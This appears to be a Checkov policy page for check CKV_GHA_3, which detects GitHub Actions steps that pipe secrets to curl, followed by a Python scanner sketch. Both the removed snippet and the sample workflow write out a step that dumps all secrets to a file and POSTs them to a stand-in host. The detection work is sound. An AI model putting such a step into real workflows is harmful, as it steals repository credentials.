Suspicious use of curl with secrets
Error: GitHub Actions curl is being used with secrets
Bridgecrew Policy ID: BC_REPO_GITHUB_ACTION_3
Checkov Check ID: CKV_GHA_3
Severity: LOW
GitHub Actions curl is being used with secrets
If a workflow can read a secret and a bad actor can modify the GitHub Action, they can use curl to send the secret to a website they own.
Fix - Buildtime
GitHub Actions
Block and remove code that attempts to exfiltrate secrets.
run: |
- echo "${{ toJSON(secrets) }}" > .secrets
- curl -X POST -s --data "@.secrets" <BADURL > /dev/null
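To review workflows for this pattern by hand, the following added example (a simplified sketch, not Checkov's own implementation) flags every `run:` step that both calls curl and expands the `secrets` context. The sample workflow, the `example.invalid` URLs and all function names are constructed for illustration.

```python
import re

# Constructed sample workflow; the first step repeats the pattern shown on this page.
SAMPLE_WORKFLOW = """\
name: build
on: push
jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - name: dump
        run: |
          echo "${{ toJSON(secrets) }}" > .secrets
          curl -X POST -s --data "@.secrets" https://collector.example.invalid > /dev/null
      - name: fetch tool
        run: curl -sSfL https://downloads.example.invalid/tool.tgz -o tool.tgz
      - name: deploy
        env:
          TOKEN: ${{ secrets.DEPLOY_TOKEN }}
        run: ./deploy.sh
"""

SECRET_EXPR = re.compile(r"\$\{\{[^}]*\bsecrets\b[^}]*\}\}")  # ${{ ... secrets ... }}
CURL_CMD = re.compile(r"(?:^|[\s;&|(])curl(?:\s|$)", re.M)     # curl invoked as a command
RUN_KEY = re.compile(r"^(\s*(?:-\s+)?)run:\s*(.*)$")           # `run:` or `- run:`

def run_blocks(workflow_text):
    """Yield (line_number, script) for each `run:` key, inline or block scalar."""
    lines = workflow_text.splitlines()
    i = 0
    while i < len(lines):
        m = RUN_KEY.match(lines[i])
        i += 1
        if not m:
            continue
        line_no, key_col, rest = i, len(m.group(1)), m.group(2).strip()
        if rest[:1] not in ("|", ">"):
            yield line_no, rest          # single-line script
            continue
        body = []                        # block scalar: lines indented deeper than the key
        while i < len(lines) and (not lines[i].strip()
                                  or len(lines[i]) - len(lines[i].lstrip()) > key_col):
            body.append(lines[i].strip())
            i += 1
        yield line_no, "\n".join(body)

def find_curl_with_secrets(workflow_text):
    """Return line numbers of `run:` steps that call curl and expand the secrets context."""
    return [n for n, script in run_blocks(workflow_text)
            if CURL_CMD.search(script) and SECRET_EXPR.search(script)]

if __name__ == "__main__":
    print(find_curl_with_secrets(SAMPLE_WORKFLOW))
```

This sketch only matches secrets expanded inside the `run:` script itself; a secret mapped into `env:` and read as a shell variable is not covered and needs a separate review.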